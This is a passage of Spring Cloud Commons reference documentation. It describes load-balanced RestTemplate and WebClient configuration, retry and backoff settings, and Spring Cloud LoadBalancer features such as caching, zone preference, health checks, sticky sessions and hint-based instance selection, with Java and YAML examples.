starter>> to your project.\nThen, `ReactiveLoadBalancer` is used underneath.
\n\n==== Retrying Failed Requests\n\nA load-balanced `RestTemplate` can be configured to retry failed requests.\nBy default, this logic is disabled.\nFor the non-reactive version (with `RestTemplate`), you can enable it by adding link:https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] to your application's classpath. For the reactive version (with `WebClient`), you need to set `spring.cloud.loadbalancer.retry.enabled=true`.\n\nIf you would like to disable the retry logic with Spring Retry or Reactive Retry on the classpath, you can set `spring.cloud.loadbalancer.retry.enabled=false`.\n\nFor the non-reactive implementation, if you would like to implement a `BackOffPolicy` in your retries, you need to create a bean of type `LoadBalancedRetryFactory` and override the `createBackOffPolicy()` method, as shown in the example after the following lists.\n\nFor the reactive implementation, you just need to enable backoff by setting `spring.cloud.loadbalancer.retry.backoff.enabled` to `true`.\n\nYou can set:\n\n- `spring.cloud.loadbalancer.retry.maxRetriesOnSameServiceInstance` - indicates how many times a request should be retried on the same `ServiceInstance` (counted separately for every selected instance)\n- `spring.cloud.loadbalancer.retry.maxRetriesOnNextServiceInstance` - indicates how many times a request should be retried on a newly selected `ServiceInstance`\n- `spring.cloud.loadbalancer.retry.retryableStatusCodes` - the status codes on which to always retry a failed request.\n\nFor the reactive implementation, you can additionally set:\n\n- `spring.cloud.loadbalancer.retry.backoff.minBackoff` - Sets the minimum backoff duration (by default, 5 milliseconds)\n- `spring.cloud.loadbalancer.retry.backoff.maxBackoff` - Sets the maximum backoff duration (by default, max long value of milliseconds)\n- `spring.cloud.loadbalancer.retry.backoff.jitter` - Sets the jitter used for calculating the actual backoff duration for each call (by default, 0.5).\n\nFor the reactive implementation, you can also implement your own `LoadBalancerRetryPolicy` to have more detailed control over the load-balanced call retries.\n\nNOTE: For load-balanced retries, by default, we wrap the `ServiceInstanceListSupplier` bean with `RetryAwareServiceInstanceListSupplier` to select a different instance from the one previously chosen, if available. You can disable this behavior by setting the value of `spring.cloud.loadbalancer.retry.avoidPreviousInstance` to `false`.
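\n\nPut together in YAML, a retry setup might look like the following (a minimal sketch; all values are illustrative, and the kebab-case keys rely on Spring Boot's relaxed binding of the camelCase properties listed above):\n\n====\n[source,yaml]\n----\nspring:\n cloud:\n loadbalancer:\n retry:\n enabled: true\n max-retries-on-same-service-instance: 1\n max-retries-on-next-service-instance: 2\n retryable-status-codes: 500,503\n----\n====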
\n\nThe following example shows how a custom `BackOffPolicy` can be provided for the non-reactive implementation:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n @Bean\n LoadBalancedRetryFactory retryFactory() {\n return new LoadBalancedRetryFactory() {\n @Override\n public BackOffPolicy createBackOffPolicy(String service) {\n return new ExponentialBackOffPolicy();\n }\n };\n }\n}\n----\n====\n\nIf you want to add one or more `RetryListener` implementations to your retry functionality, you need to\ncreate a bean of type `LoadBalancedRetryListenerFactory` and return the `RetryListener` array\nyou would like to use for a given service, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n @Bean\n LoadBalancedRetryListenerFactory retryListenerFactory() {\n return new LoadBalancedRetryListenerFactory() {\n @Override\n public RetryListener[] createRetryListeners(String service) {\n return new RetryListener[]{new RetryListener() {\n @Override\n public <T, E extends Throwable> boolean open(RetryContext context, RetryCallback<T, E> callback) {\n \/\/TODO Do your business...\n return true;\n }\n\n @Override\n public <T, E extends Throwable> void close(RetryContext context, RetryCallback<T, E> callback, Throwable throwable) {\n \/\/TODO Do your business...\n }\n\n @Override\n public <T, E extends Throwable> void onError(RetryContext context, RetryCallback<T, E> callback, Throwable throwable) {\n \/\/TODO Do your business...\n }\n }};\n }\n };\n }\n}\n----\n====\n\n=== Multiple `RestTemplate` Objects\n\nIf you want a `RestTemplate` that is not load-balanced, create a `RestTemplate` bean and inject it.\nTo access the load-balanced `RestTemplate`, use the `@LoadBalanced` qualifier when you create your `@Bean`, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n RestTemplate loadBalanced() {\n return new RestTemplate();\n }\n\n @Primary\n @Bean\n RestTemplate restTemplate() {\n return new RestTemplate();\n }\n}\n\npublic class MyClass {\n @Autowired\n private RestTemplate restTemplate;\n\n @Autowired\n @LoadBalanced\n private RestTemplate loadBalanced;\n\n public String doOtherStuff() {\n return loadBalanced.getForObject(\"http:\/\/stores\/stores\", String.class);\n }\n\n public String doStuff() {\n return restTemplate.getForObject(\"http:\/\/example.com\", String.class);\n }\n}\n----\n====\n\nIMPORTANT: Notice the use of the `@Primary` annotation on the plain `RestTemplate` declaration in the preceding example to disambiguate the unqualified `@Autowired` injection.\n\nTIP: If you see errors such as `java.lang.IllegalArgumentException: Can not set org.springframework.web.client.RestTemplate field com.my.app.Foo.restTemplate to com.sun.proxy.$Proxy89`, try injecting `RestOperations` or setting `spring.aop.proxyTargetClass=true`.\n\n=== Multiple WebClient Objects\n\nIf you want a `WebClient` that is not load-balanced, create a `WebClient` bean and inject it.\nTo access the load-balanced `WebClient`, use the `@LoadBalanced` qualifier when you create your `@Bean`, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n WebClient.Builder loadBalanced() {\n return WebClient.builder();\n }\n\n @Primary\n @Bean\n WebClient.Builder webClient() {\n return WebClient.builder();\n }\n}\n\npublic class MyClass {\n
@Autowired\n private WebClient.Builder webClientBuilder;\n\n @Autowired\n @LoadBalanced\n private WebClient.Builder loadBalanced;\n\n public Mono<String> doOtherStuff() {\n return loadBalanced.build().get().uri(\"http:\/\/stores\/stores\")\n .retrieve().bodyToMono(String.class);\n }\n\n public Mono<String> doStuff() {\n return webClientBuilder.build().get().uri(\"http:\/\/example.com\")\n .retrieve().bodyToMono(String.class);\n }\n}\n----\n====\n\n[[loadbalanced-webclient]]\n=== Spring WebFlux `WebClient` as a Load Balancer Client\n\nSpring WebFlux can work with both reactive and non-reactive `WebClient` configurations, as the following topics describe:\n\n* <<webflux-with-reactive-loadbalancer>>\n* <<load-balancer-exchange-filter-function>>\n\n[[webflux-with-reactive-loadbalancer]]\n==== Spring WebFlux `WebClient` with `ReactorLoadBalancerExchangeFilterFunction`\n\nYou can configure `WebClient` to use the `ReactiveLoadBalancer`.\nIf you add the <<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer starter>> to your project\nand if `spring-webflux` is on the classpath, `ReactorLoadBalancerExchangeFilterFunction` is auto-configured.\nThe following example shows how to configure a `WebClient` to use the reactive load-balancer:\n\n====\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private ReactorLoadBalancerExchangeFilterFunction lbFunction;\n\n public Mono<String> doOtherStuff() {\n return WebClient.builder().baseUrl(\"http:\/\/stores\")\n .filter(lbFunction)\n .build()\n .get()\n .uri(\"\/stores\")\n .retrieve()\n .bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe `ReactorLoadBalancer` is used to create a full physical address.\n\n[[load-balancer-exchange-filter-function]]\n==== Spring WebFlux `WebClient` with a Non-reactive Load Balancer Client\n\nIf `spring-webflux` is on the classpath, `LoadBalancerExchangeFilterFunction`\nis auto-configured.
Note, however, that this\nuses a non-reactive client under the hood.\nThe following example shows how to configure a `WebClient` to use the load-balancer:\n\n====\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private LoadBalancerExchangeFilterFunction lbFunction;\n\n public Mono<String> doOtherStuff() {\n return WebClient.builder().baseUrl(\"http:\/\/stores\")\n .filter(lbFunction)\n .build()\n .get()\n .uri(\"\/stores\")\n .retrieve()\n .bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe `LoadBalancerClient` is used to create a full physical address.\n\nWARNING: This approach is now deprecated.\nWe suggest that you use <<webflux-with-reactive-loadbalancer,WebFlux with reactive Load-Balancer>>\ninstead.\n\n[[ignore-network-interfaces]]\n=== Ignore Network Interfaces\n\nSometimes, it is useful to ignore certain named network interfaces so that they can be excluded from Service Discovery registration (for example, when running in a Docker container).\nA list of regular expressions can be set to cause the desired network interfaces to be ignored.\nThe following configuration ignores the `docker0` interface and all interfaces that start with `veth`:\n\n.application.yml\n====\n----\nspring:\n cloud:\n inetutils:\n ignoredInterfaces:\n - docker0\n - veth.*\n----\n====\n\nYou can also force the use of only specified network addresses by using a list of regular expressions, as the following example shows:\n\n.bootstrap.yml\n====\n----\nspring:\n cloud:\n inetutils:\n preferredNetworks:\n - 192.168\n - 10.0\n----\n====\n\nYou can also force the use of only site-local addresses, as the following example shows:\n\n.application.yml\n====\n----\nspring:\n cloud:\n inetutils:\n useOnlySiteLocalInterfaces: true\n----\n====\n\nSee https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/net\/Inet4Address.html#isSiteLocalAddress--[Inet4Address.html.isSiteLocalAddress()] for more details about what constitutes a site-local address.\n\n[[http-clients]]\n=== HTTP Client Factories\n\nSpring Cloud Commons provides beans for creating both Apache HTTP clients (`ApacheHttpClientFactory`) and OK HTTP clients (`OkHttpClientFactory`).\nThe `OkHttpClientFactory` bean is created only if the OK HTTP jar is on the classpath.\nIn addition, Spring Cloud Commons provides beans for creating the connection managers used by both clients: `ApacheHttpClientConnectionManagerFactory` for the Apache HTTP client and `OkHttpClientConnectionPoolFactory` for the OK HTTP client.\nIf you would like to customize how the HTTP clients are created in downstream projects, you can provide your own implementation of these beans.\nIn addition, if you provide a bean of type `HttpClientBuilder` or `OkHttpClient.Builder`, the default factories use these builders as the basis for the builders returned to downstream projects.\nYou can also disable the creation of these beans by setting `spring.cloud.httpclientfactories.apache.enabled` or `spring.cloud.httpclientfactories.ok.enabled` to `false`.
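\n\nFor instance, a minimal sketch of supplying your own pre-configured builder might look as follows (the customization shown is illustrative; `HttpClientBuilder` here is the standard Apache HttpComponents builder):\n\n====\n[source,java]\n----\n@Configuration\npublic class MyHttpClientConfiguration {\n\n @Bean\n public HttpClientBuilder apacheHttpClientBuilder() {\n \/\/ the default ApacheHttpClientFactory uses this builder as its starting point\n return HttpClientBuilder.create().disableCookieManagement();\n }\n}\n----\n====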
\n\n[[enabled-features]]\n=== Enabled Features\n\nSpring Cloud Commons provides a `\/features` actuator endpoint.\nThis endpoint returns features available on the classpath and whether they are enabled.\nThe information returned includes the feature type, name, version, and vendor.\n\n==== Feature types\n\nThere are two types of 'features': abstract and named.\n\nAbstract features are features where an interface or abstract class is defined and that an implementation creates, such as `DiscoveryClient`, `LoadBalancerClient`, or `LockService`.\nThe abstract class or interface is used to find a bean of that type in the context.\nThe version displayed is `bean.getClass().getPackage().getImplementationVersion()`.\n\nNamed features are features that do not have a particular class they implement. These features include \"`Circuit Breaker`\", \"`API Gateway`\", \"`Spring Cloud Bus`\", and others. These features require a name and a bean type.\n\n==== Declaring features\n\nAny module can declare any number of `HasFeature` beans, as the following examples show:\n\n====\n[source,java,indent=0]\n----\n@Bean\npublic HasFeatures commonsFeatures() {\n return HasFeatures.abstractFeatures(DiscoveryClient.class, LoadBalancerClient.class);\n}\n\n@Bean\npublic HasFeatures consulFeatures() {\n return HasFeatures.namedFeatures(\n new NamedFeature(\"Spring Cloud Bus\", ConsulBusAutoConfiguration.class),\n new NamedFeature(\"Circuit Breaker\", HystrixCommandAspect.class));\n}\n\n@Bean\nHasFeatures localFeatures() {\n return HasFeatures.builder()\n .abstractFeature(Something.class)\n .namedFeature(new NamedFeature(\"Some Other Feature\", Someother.class))\n .abstractFeature(Somethingelse.class)\n .build();\n}\n----\n====\n\nEach of these beans should go in an appropriately guarded `@Configuration`.\n\n\n=== Spring Cloud Compatibility Verification\n\nBecause some users have problems setting up Spring Cloud applications, we decided to add a compatibility verification mechanism.\nIt breaks the startup if your current setup is not compatible with Spring Cloud requirements and produces a report showing what exactly went wrong.\n\nAt the moment, we verify which version of Spring Boot is added to your classpath.\n\nThe following listing shows an example of a report:\n\n====\n----\n***************************\nAPPLICATION FAILED TO START\n***************************\n\nDescription:\n\nYour project setup is incompatible with our requirements due to following reasons:\n\n- Spring Boot [2.1.0.RELEASE] is not compatible with this Spring Cloud release train\n\n\nAction:\n\nConsider applying the following actions:\n\n- Change Spring Boot version to one of the following versions [1.2.x, 1.3.x] .\nYou can find the latest Spring Boot versions here [https:\/\/spring.io\/projects\/spring-boot#learn].\nIf you want to learn more about the Spring Cloud Release train compatibility, you can visit this page [https:\/\/spring.io\/projects\/spring-cloud#overview] and check the [Release Trains] section.\n----\n====\n\nIn order to disable this feature, set `spring.cloud.compatibility-verifier.enabled` to `false`.\nIf you want to override the compatible Spring Boot versions, just set the\n`spring.cloud.compatibility-verifier.compatible-boot-versions` property with a comma-separated list\nof compatible Spring Boot versions.
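\n\nIn YAML form, both settings might look like the following (the version list is illustrative, not an official compatibility matrix):\n\n====\n[source,yaml]\n----\nspring:\n cloud:\n compatibility-verifier:\n enabled: true\n compatible-boot-versions: 2.2.x,2.3.x\n----\n====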
\n\n== Spring Cloud LoadBalancer\n\nSpring Cloud provides its own client-side load-balancer abstraction and implementation. For the load-balancing\nmechanism, the `ReactiveLoadBalancer` interface has been added, and *Round-Robin-based* and *Random* implementations\nhave been provided for it. In order to get instances to select from, a reactive `ServiceInstanceListSupplier`\nis used. Currently, we support a service-discovery-based implementation of `ServiceInstanceListSupplier`\nthat retrieves available instances from Service Discovery using a <<discovery-client, Discovery Client>> available in the classpath.\n\nTIP: It is possible to disable Spring Cloud LoadBalancer by setting the value of `spring.cloud.loadbalancer.enabled` to `false`.\n\n=== Switching between the load-balancing algorithms\n\nThe `ReactiveLoadBalancer` implementation that is used by default is `RoundRobinLoadBalancer`. To switch to a different implementation, either for selected services or all of them, you can use the <<custom-loadbalancer-configuration, custom LoadBalancer configurations mechanism>>.\n\nFor example, the following configuration can be passed via the `@LoadBalancerClient` annotation to switch to using the `RandomLoadBalancer`:\n\n[[random-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n @Bean\n ReactorLoadBalancer<ServiceInstance> randomLoadBalancer(Environment environment,\n LoadBalancerClientFactory loadBalancerClientFactory) {\n String name = environment.getProperty(LoadBalancerClientFactory.PROPERTY_NAME);\n return new RandomLoadBalancer(loadBalancerClientFactory\n .getLazyProvider(name, ServiceInstanceListSupplier.class),\n name);\n }\n}\n----\n\nNOTE: The classes you pass as `@LoadBalancerClient` or `@LoadBalancerClients` configuration arguments should either not be annotated with `@Configuration` or be outside component scan scope.\n\n=== Spring Cloud LoadBalancer integrations\n\nIn order to make it easy to use Spring Cloud LoadBalancer, we provide `ReactorLoadBalancerExchangeFilterFunction`, which can be used with `WebClient`, and `BlockingLoadBalancerClient`, which works with `RestTemplate`.\nYou can see more information and examples of usage in the following sections:\n\n* <<rest-template-loadbalancer-client,Spring RestTemplate as a Load Balancer Client>>\n* <<webclinet-loadbalancer-client, Spring WebClient as a Load Balancer Client>>\n* <<webflux-with-reactive-loadbalancer,Spring WebFlux WebClient with `ReactorLoadBalancerExchangeFilterFunction`>>\n\n[[loadbalancer-caching]]\n=== Spring Cloud LoadBalancer Caching\n\nApart from the basic `ServiceInstanceListSupplier` implementation that retrieves instances via `DiscoveryClient` each time it has to choose an instance, we provide two caching implementations.\n\n==== https:\/\/github.com\/ben-manes\/caffeine[Caffeine]-backed LoadBalancer Cache Implementation\n\nIf you have `com.github.ben-manes.caffeine:caffeine` in the classpath, a Caffeine-based implementation will be used.\nSee the <<loadbalancer-cache-configuration, LoadBalancerCacheConfiguration>> section for information on how to configure it.\n\nIf you are using Caffeine, you can also override the default Caffeine Cache setup for the LoadBalancer by passing your own https:\/\/static.javadoc.io\/com.github.ben-manes.caffeine\/caffeine\/2.2.2\/com\/github\/benmanes\/caffeine\/cache\/CaffeineSpec.html[Caffeine Specification]\nin the `spring.cloud.loadbalancer.cache.caffeine.spec` property.\n\nWARNING: Passing your own Caffeine specification will override any other LoadBalancerCache settings, including <<loadbalancer-cache-configuration, General LoadBalancer Cache Configuration>> fields, such as `ttl` and `capacity`.
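\n\nFor example, the following property passes an illustrative specification (standard `CaffeineSpec` syntax; the values shown are not the defaults):\n\n====\n[source,yaml]\n----\nspring:\n cloud:\n loadbalancer:\n cache:\n caffeine:\n spec: initialCapacity=500,expireAfterWrite=30s\n----\n====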
`spring-cloud-starter-loadbalancer`, will be used.\nSee the <<loadbalancer-cache-configuration, LoadBalancerCacheConfiguration>> section for information on how to configure it.\n\nTIP: To use Caffeine instead of the default cache, add the `com.github.ben-manes.caffeine:caffeine` dependency to classpath.\n\n[[loadbalancer-cache-configuration]]\n==== LoadBalancer Cache Configuration\n\nYou can set your own `ttl` value (the time after write after which entries should be expired), expressed as `Duration`, by passing a `String` compliant with the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/spring-boot-features.html#boot-features-external-config-conversion-duration[Spring Boot `String` to `Duration` converter syntax].\nas the value of the `spring.cloud.loadbalancer.cache.ttl` property.\nYou can also set your own LoadBalancer cache initial capacity by setting the value of the `spring.cloud.loadbalancer.cache.capacity` property.\n\nThe default setup includes `ttl` set to 35 seconds and the default `initialCapacity` is `256`.\n\nYou can also altogether disable loadBalancer caching by setting the value of `spring.cloud.loadbalancer.cache.enabled`\nto `false`.\n\nWARNING: Although the basic, non-cached, implementation is useful for prototyping and testing, it's much less efficient than the cached versions, so we recommend always using the cached version in production. If the caching is already done by the `DiscoveryClient` implementation, for example `EurekaDiscoveryClient`, the load-balancer caching should be disabled to prevent double caching.\n\n=== Zone-Based Load-Balancing\n\nTo enable zone-based load-balancing, we provide the `ZonePreferenceServiceInstanceListSupplier`.\nWe use `DiscoveryClient`-specific `zone` configuration (for example, `eureka.instance.metadata-map.zone`) to pick the zone that the client tries to filter available service instances for.\n\nNOTE: You can also override `DiscoveryClient`-specific zone setup by setting the value of `spring.cloud.loadbalancer.zone` property.\n\nWARNING: For the time being, only Eureka Discovery Client is instrumented to set the LoadBalancer zone. For other discovery client, set the `spring.cloud.loadbalancer.zone` property. 
More instrumentations coming shortly.\n\nNOTE: To determine the zone of a retrieved `ServiceInstance`, we check the value under the `\"zone\"` key in its metadata map.\n\nThe `ZonePreferenceServiceInstanceListSupplier` filters retrieved instances and only returns the ones within the same zone.\nIf the zone is `null` or there are no instances within the same zone, it returns all the retrieved instances.\n\nIn order to use the zone-based load-balancing approach, you will have to instantiate a `ZonePreferenceServiceInstanceListSupplier` bean in a <<custom-loadbalancer-configuration,custom configuration>>.\n\nWe use delegates to work with `ServiceInstanceListSupplier` beans.\nWe suggest passing a `DiscoveryClientServiceInstanceListSupplier` delegate in the constructor of `ZonePreferenceServiceInstanceListSupplier` and, in turn, wrapping the latter with a `CachingServiceInstanceListSupplier` to leverage <<loadbalancer-caching, LoadBalancer caching mechanism>>.\n\nYou could use this sample configuration to set it up:\n\n[[zoned-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withZonePreference()\n\t\t\t\t\t.withCaching()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\n=== Instance Health-Check for LoadBalancer\n\nIt is possible to enable a scheduled HealthCheck for the LoadBalancer. The `HealthCheckServiceInstanceListSupplier`\nis provided for that. It regularly verifies if the instances provided by a delegate\n`ServiceInstanceListSupplier` are still alive and only returns the healthy instances,\nunless there are none - then it returns all the retrieved instances.\n\nTIP: This mechanism is particularly helpful while using the `SimpleDiscoveryClient`. For the\nclients backed by an actual Service Registry, it's not necessary to use, as we already get\nhealthy instances after querying the external ServiceDiscovery.\n\nTIP: This supplier is also recommended for setups with a small number of instances per service\nin order to avoid retrying calls on a failing instance.\n\nWARNING: If using any of the Service Discovery-backed suppliers, adding this health-check mechanism is usually not necessary, as we retrieve the health state of the instances directly\nfrom the Service Registry.\n\nTIP: The `HealthCheckServiceInstanceListSupplier` relies on having updated instances provided by a delegate flux. In the rare cases when you want to use a delegate that does not refresh the instances, even though the list of instances may change (such as the `ReactiveDiscoveryClientServiceInstanceListSupplier` provided by us), you can set `spring.cloud.loadbalancer.health-check.refetch-instances` to `true` to have the instance list refreshed by the `HealthCheckServiceInstanceListSupplier`. You can then also adjust the refretch intervals by modifying the value of `spring.cloud.loadbalancer.health-check.refetch-instances-interval` and opt to disable the additional healthcheck repetitions by setting `spring.cloud.loadbalancer.health-check.repeat-health-check` to `false` as every instances refetch\n will also trigger a healthcheck.\n\n`HealthCheckServiceInstanceListSupplier` uses properties prefixed with\n`spring.cloud.loadbalancer.health-check`. You can set the `initialDelay` and `interval`\nfor the scheduler. 
You can set the default path for the healthcheck URL by setting\nthe value of the `spring.cloud.loadbalancer.health-check.path.default` property. You can also set a specific value for any given service by setting the value of the `spring.cloud.loadbalancer.health-check.path.[SERVICE_ID]` property, substituting `[SERVICE_ID]` with the correct ID of your service. If the path is not set, `\/actuator\/health` is used by default.\n\nTIP: If you rely on the default path (`\/actuator\/health`), make sure you add `spring-boot-starter-actuator` to your collaborator's dependencies, unless you are planning to add such an endpoint on your own.\n\nIn order to use the health-check scheduler approach, you will have to instantiate a `HealthCheckServiceInstanceListSupplier` bean in a <<custom-loadbalancer-configuration,custom configuration>>.\n\nWe use delegates to work with `ServiceInstanceListSupplier` beans.\nWe suggest passing a `DiscoveryClientServiceInstanceListSupplier` delegate in the constructor of `HealthCheckServiceInstanceListSupplier`.\n\nYou could use this sample configuration to set it up:\n\n[[health-check-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withHealthChecks()\n\t\t\t\t\t.build(context);\n\t }\n\t}\n----\n\nTIP: For the non-reactive stack, create this supplier with the `withBlockingHealthChecks()`.\nYou can also pass your own `WebClient` or `RestTemplate` instance to be used for the checks.\n\nWARNING: `HealthCheckServiceInstanceListSupplier` has its own caching mechanism based on Reactor Flux `replay()`. Therefore, if it's being used, you may want to skip wrapping that supplier with `CachingServiceInstanceListSupplier`.\n\n=== Same instance preference for LoadBalancer\n\nYou can set up the LoadBalancer in such a way that it prefers the instance that was previously selected, if that instance is available.\n\nFor that, you need to use `SameInstancePreferenceServiceInstanceListSupplier`. You can configure it either by setting the value of `spring.cloud.loadbalancer.configurations` to `same-instance-preference` or by providing your own `ServiceInstanceListSupplier` bean -- for example:\n\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withSameInstancePreference()\n\t\t\t\t\t.build(context);\n\t }\n\t}\n----\n\nTIP: This is also a replacement for Zookeeper `StickyRule`.\n\n=== Request-based Sticky Session for LoadBalancer\n\nYou can set up the LoadBalancer in such a way that it prefers the instance with `instanceId` provided in a request cookie. We currently support this if the request is being passed to the LoadBalancer through either `ClientRequestContext` or `ServerHttpRequestContext`, which are used by the SC LoadBalancer exchange filter functions and filters.\n\nFor that, you need to use the `RequestBasedStickySessionServiceInstanceListSupplier`. 
You can configure it either by setting the value of `spring.cloud.loadbalancer.configurations` to `request-based-sticky-session` or by providing your own `ServiceInstanceListSupplier` bean -- for example:\n\n[[health-check-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withRequestBasedStickySession()\n\t\t\t\t\t.build(context);\n\t }\n\t}\n----\n\nFor that functionality, it is useful to have the selected service instance (which can be different from the one in the original request cookie if that one is not available) to be updated before sending the request forward. To do that, set the value of `spring.cloud.loadbalancer.sticky-session.add-service-instance-cookie` to `true`.\n\nBy default, the name of the cookie is `sc-lb-instance-id`. You can modify it by changing the value of the `spring.cloud.loadbalancer.instance-id-cookie-name` property.\n\nNOTE: This feature is currently supported for WebClient-backed load-balancing.\n\n[[spring-cloud-loadbalancer-hints]]\n=== Spring Cloud LoadBalancer Hints\n\nSpring Cloud LoadBalancer lets you set `String` hints that are passed to the LoadBalancer within the `Request` object and that can later be used in `ReactiveLoadBalancer` implementations that can handle them.\n\nYou can set a default hint for all services by setting the value of the `spring.cloud.loadbalancer.hint.default` property. You can also set a specific value\nfor any given service by setting the value of the `spring.cloud.loadbalancer.hint.[SERVICE_ID]` property, substituting `[SERVICE_ID]` with the correct ID of your service. If the hint is not set by the user, `default` is used.\n\n[[hints-based-loadbalancing]]\n=== Hint-Based Load-Balancing\n\nWe also provide a `HintBasedServiceInstanceListSupplier`, which is a `ServiceInstanceListSupplier` implementation for hint-based instance selection.\n\n`HintBasedServiceInstanceListSupplier` checks for a hint request header (the default header-name is `X-SC-LB-Hint`, but you can modify it by changing the value of the `spring.cloud.loadbalancer.hint-header-name` property) and, if it finds a hint request header, uses the hint value passed in the header to filter service instances.\n\nIf no hint header has been added, `HintBasedServiceInstanceListSupplier` uses <<spring-cloud-loadbalancer-hints,hint values from properties>> to filter service instances.\n\nIf no hint is set, either by the header or by properties, all service instances provided by the delegate are returned.\n\nWhile filtering, `HintBasedServiceInstanceListSupplier` looks for service instances that have a matching value set under the `hint` key in their `metadataMap`. 
If no matching instances are found, all instances provided by the delegate are returned.\n\nYou could use the following sample configuration to set it up:\n\n[[hints-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withHints()\n\t\t\t\t\t.withCaching()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\n=== Transform the load-balanced HTTP request\n\nYou can use the selected `ServiceInstance` to transform the load-balanced HTTP Request.\n\nFor `RestTemplate`, you need to implement and define `LoadBalancerRequestTransformer` as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic LoadBalancerRequestTransformer transformer() {\n\t\treturn new LoadBalancerRequestTransformer() {\n\t\t\t@Override\n\t\t\tpublic HttpRequest transformRequest(HttpRequest request, ServiceInstance instance) {\n\t\t\t\treturn new HttpRequestWrapper(request) {\n\t\t\t\t\t@Override\n\t\t\t\t\tpublic HttpHeaders getHeaders() {\n\t\t\t\t\t\tHttpHeaders headers = new HttpHeaders();\n\t\t\t\t\t\theaders.putAll(super.getHeaders());\n\t\t\t\t\t\theaders.add(\"X-InstanceId\", instance.getInstanceId());\n\t\t\t\t\t\treturn headers;\n\t\t\t\t\t}\n\t\t\t\t};\n\t\t\t}\n\t\t};\n\t}\n----\n\nFor `WebClient`, you need to implement and define `LoadBalancerClientRequestTransformer` as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic LoadBalancerClientRequestTransformer transformer() {\n\t\treturn new LoadBalancerClientRequestTransformer() {\n\t\t\t@Override\n\t\t\tpublic ClientRequest transformRequest(ClientRequest request, ServiceInstance instance) {\n\t\t\t\treturn ClientRequest.from(request)\n\t\t\t\t\t\t.header(\"X-InstanceId\", instance.getInstanceId())\n\t\t\t\t\t\t.build();\n\t\t\t}\n\t\t};\n\t}\n----\n\nIf multiple transformers are defined, they are applied in the order in which Beans are defined.\nAlternatively, you can use `LoadBalancerRequestTransformer.DEFAULT_ORDER` or `LoadBalancerClientRequestTransformer.DEFAULT_ORDER` to specify the order.\n\n[[spring-cloud-loadbalancer-starter]]\n=== Spring Cloud LoadBalancer Starter\n\nWe also provide a starter that allows you to easily add Spring Cloud LoadBalancer in a Spring Boot app.\nIn order to use it, just add `org.springframework.cloud:spring-cloud-starter-loadbalancer` to your Spring Cloud dependencies in your build file.\n\nNOTE: Spring Cloud LoadBalancer starter includes\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-caching.html[Spring Boot Caching]\nand https:\/\/github.com\/stoyanr\/Evictor[Evictor].\n\n[[custom-loadbalancer-configuration]]\n=== Passing Your Own Spring Cloud LoadBalancer Configuration\n\nYou can also use the `@LoadBalancerClient` annotation to pass your own load-balancer client configuration, passing the name of the load-balancer client and the configuration class, as follows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@LoadBalancerClient(value = \"stores\", configuration = CustomLoadBalancerConfiguration.class)\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n----\n\nTIP:: In order to make working on your own LoadBalancer configuration easier, we have added a `builder()` method 
